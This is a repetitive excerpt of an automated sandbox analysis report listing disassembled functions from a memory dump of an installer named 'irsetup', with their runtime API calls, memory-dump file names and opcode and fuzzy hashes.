                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
                                                                                                                    • Instruction ID: e70739f4f642107e89704e3f638af8b430b091e6b205e4125928beaead29ef60
                                                                                                                    • Opcode Fuzzy Hash: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
                                                                                                                    • Instruction Fuzzy Hash: 1531F332611A8841E793AFA6A8417EE3651B7897F0F52C316FE3907BD6CE38C245C700
                                                                                                                    Function 0000000180032D98 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
                                                                                                                    • Instruction ID: d9038f30b84bd084f134f145b4ea9161b6956bb9982c7eca4ea7920d869c151e
                                                                                                                    • Opcode Fuzzy Hash: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
                                                                                                                    • Instruction Fuzzy Hash: 20310432610A9841E793AF26A8427EE3651B789BE0F52C616BE650B7D2CF38C6098700
                                                                                                                    Function 000000018002C68C Relevance: 12.1, APIs: 8, Instructions: 79COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
                                                                                                                    • Instruction ID: ec033c54c6d7d521fc6e23a01929881988fa191f7bf2fc9d76832262eb4df226
                                                                                                                    • Opcode Fuzzy Hash: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
                                                                                                                    • Instruction Fuzzy Hash: 5131E132614ADC41E7A3AF35A841BAE3751B7897E0F65C616FA25077D2CF38C6088B02
                                                                                                                    Function 00000001800305E8 Relevance: 12.0, APIs: 8, Instructions: 50synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 280878599-0
                                                                                                                    • Opcode ID: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
                                                                                                                    • Instruction ID: 68bd96f5714e3ffe11f7f818daa76e97712db3409049de95b658a461dfe5d033
                                                                                                                    • Opcode Fuzzy Hash: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
                                                                                                                    • Instruction Fuzzy Hash: 1511003060168882EBE35FA5A5503BE2760A78DBF0F26C310F976037E9CE38C659CB01
                                                                                                                    Function 000000018002C830 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStartupInfoA.KERNEL32 ref: 000000018002C855
                                                                                                                      • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
                                                                                                                    • GetFileType.KERNEL32 ref: 000000018002C9D2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 1527402494-2766056989
                                                                                                                    • Opcode ID: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
                                                                                                                    • Instruction ID: 230c68c653191f54178d303bf2b0e4d8cf0cc3789bfed5754acc8c55ed461bfd
                                                                                                                    • Opcode Fuzzy Hash: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
                                                                                                                    • Instruction Fuzzy Hash: 43916232214A8881E7A3CB29D448BA827A5F3097F8F65C715E679473E1DF79C94AC313
                                                                                                                    Function 000000018001FBE8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: +$-$0$0
                                                                                                                    • API String ID: 3432092939-699404926
                                                                                                                    • Opcode ID: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
                                                                                                                    • Instruction ID: cdf1d1b669f77c7e48de24e0b0f5a27944c92b146814c4b507a9b0648c28b355
                                                                                                                    • Opcode Fuzzy Hash: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
                                                                                                                    • Instruction Fuzzy Hash: 2B71D332904E8C81F7F78A25E4553FA26D2B7897D4F29C116FF56023D1DF68CA498342
                                                                                                                    Function 000000018000DA70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_fread_nolock
                                                                                                                    • String ID: %lf$invalid format$invalid option$too many arguments
                                                                                                                    • API String ID: 1771911937-3304058045
                                                                                                                    • Opcode ID: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
                                                                                                                    • Instruction ID: 4ecbb218ed77667f7209945df211a99de47e7cbe1f5077c6477dde9f3f5f1065
                                                                                                                    • Opcode Fuzzy Hash: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
                                                                                                                    • Instruction Fuzzy Hash: 9A51F13120464C86FAE7E62656517FE73416B8EBE0F85C112BD060B7C7DE28CB0E8391
                                                                                                                    Function 0000000180033098 Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2918714741-0
                                                                                                                    • Opcode ID: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
                                                                                                                    • Instruction ID: 529fb29261052428e6b08158eb4e60c077481b13b416dc635a86f518e286f846
                                                                                                                    • Opcode Fuzzy Hash: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
                                                                                                                    • Instruction Fuzzy Hash: 1931F631B10A8C45F7A7AF79A8963EF2751A7897D0F16C61DBA25073D2CF788608C704
                                                                                                                    Function 00000001800213B4 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3485708101-0
                                                                                                                    • Opcode ID: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
                                                                                                                    • Instruction ID: a4978cb5b150d70a31ac02c29fe7af899a0e20301038a663c4a8e9806da71e5f
                                                                                                                    • Opcode Fuzzy Hash: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
                                                                                                                    • Instruction Fuzzy Hash: 4421D73171068886F793BB25D4113EE6351B7997D5F14C512BA5D0BAC3DF78CA08C701
                                                                                                                    Function 000000018002D20C Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _FF_MSGBANNER.LIBCMT ref: 000000018002D233
                                                                                                                      • Part of subcall function 000000018002F154: GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
                                                                                                                      • Part of subcall function 000000018002082C: ExitProcess.KERNEL32 ref: 000000018002083B
                                                                                                                      • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    • _errno.LIBCMT ref: 000000018002D275
                                                                                                                    • _lock.LIBCMT ref: 000000018002D289
                                                                                                                    • free.LIBCMT ref: 000000018002D2AB
                                                                                                                    • _errno.LIBCMT ref: 000000018002D2B0
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC,?,?,?,000000018001E8ED), ref: 000000018002D2D6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1024173049-0
                                                                                                                    • Opcode ID: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
                                                                                                                    • Instruction ID: 6158d1e52bbdfd4d1479ce80147eb334c54af6b62df8d85375debdae957d05bd
                                                                                                                    • Opcode Fuzzy Hash: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
                                                                                                                    • Instruction Fuzzy Hash: CD215831615A4C82F6E7AB50A9403EA6395A79D7C4F05C026BA4A877C6CFB8CA4C8340
                                                                                                                    Function 000000018002FEF8 Relevance: 10.5, APIs: 7, Instructions: 44COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$AttributesDecodeErrorFileLastPointer__doserrno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 24609805-0
                                                                                                                    • Opcode ID: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
                                                                                                                    • Instruction ID: 62db423ae1bf48e4f4470d80ab43833ba7cfcbac53acf032b2a4a70ed809b53f
                                                                                                                    • Opcode Fuzzy Hash: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
                                                                                                                    • Instruction Fuzzy Hash: 2B019E7161058C46FBF36B789A123FE23905F8E3D0F84C635FA15423CACE284A088711
                                                                                                                    Function 0000000180026160 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp$_set_exp_umatherr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3511029064-0
                                                                                                                    • Opcode ID: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
                                                                                                                    • Instruction ID: b049e6e4e90f587d1ae26f8248ab9d02cc25cde2fa3ace03e7f94499fe5c5a36
                                                                                                                    • Opcode Fuzzy Hash: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
                                                                                                                    • Instruction Fuzzy Hash: 33413871E08E4C85F6A35A3489513EEA385DF9E3D5F11C325B9022B6F6DF18969E4300
                                                                                                                    Function 000000018003ABF8 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2210154019-0
                                                                                                                    • Opcode ID: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
                                                                                                                    • Instruction ID: 99c728c995c363288e4645a8cfd7ec9812841acb19d10564c0c81df42c91df12
                                                                                                                    • Opcode Fuzzy Hash: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
                                                                                                                    • Instruction Fuzzy Hash: FF317135614A8C86FBA2CB10E8443A76361F78A7B8F619315F66A066E4CF7DC78D8740
                                                                                                                    Function 000000018002C254 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C25E
                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C26C
                                                                                                                    • SetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C2C4
                                                                                                                      • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C298
                                                                                                                    • free.LIBCMT ref: 000000018002C2BB
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000000018002C2AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3106088686-0
                                                                                                                    • Opcode ID: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
                                                                                                                    • Instruction ID: 0dfceef3c332b8433fd22f826c40fe3083664a76df6c8c25525dd3dfe5458ebd
                                                                                                                    • Opcode Fuzzy Hash: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
                                                                                                                    • Instruction Fuzzy Hash: 63017135201B08C2FBE79BA5A5847A92391AB4CBE0F09C625F926423D5DE38D64D8711
                                                                                                                    Function 0000000180036640 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1012874770-0
                                                                                                                    • Opcode ID: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
                                                                                                                    • Instruction ID: 4b4e489caf5932047fa857d54ce27d1b13f5d9450eda61c6167a0ffc8242f040
                                                                                                                    • Opcode Fuzzy Hash: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
                                                                                                                    • Instruction Fuzzy Hash: 1F01AD72600C0C91EBE3EB61D4A23F96360A7CC7C8F46C043F51E876A6CE24DB888725
                                                                                                                    Function 00000001800366D8 Relevance: 7.7, APIs: 6, Instructions: 246COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
                                                                                                                    • Instruction ID: a769455a77138ef5747765841ac36d0ccc4094dbcb8b52754ceed79c47d1f62a
                                                                                                                    • Opcode Fuzzy Hash: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
                                                                                                                    • Instruction Fuzzy Hash: EEB17332714B8885EBA3DF62E4507DAB7A4F789BC4F408126BA8E47795DF38C219C740
                                                                                                                    Function 0000000180033C78 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156100317-0
                                                                                                                    • Opcode ID: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
                                                                                                                    • Instruction ID: 12e77770c186e875bdaf3e9738c6c902f4d3ba9da1e990d93e387186277e3745
                                                                                                                    • Opcode Fuzzy Hash: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
                                                                                                                    • Instruction Fuzzy Hash: 0851A832514D8C85F2F79F34B4963EBA351BB4A7D4F12C219BA562A5E0EF348B8D8700
                                                                                                                    Function 00000001800216AC Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
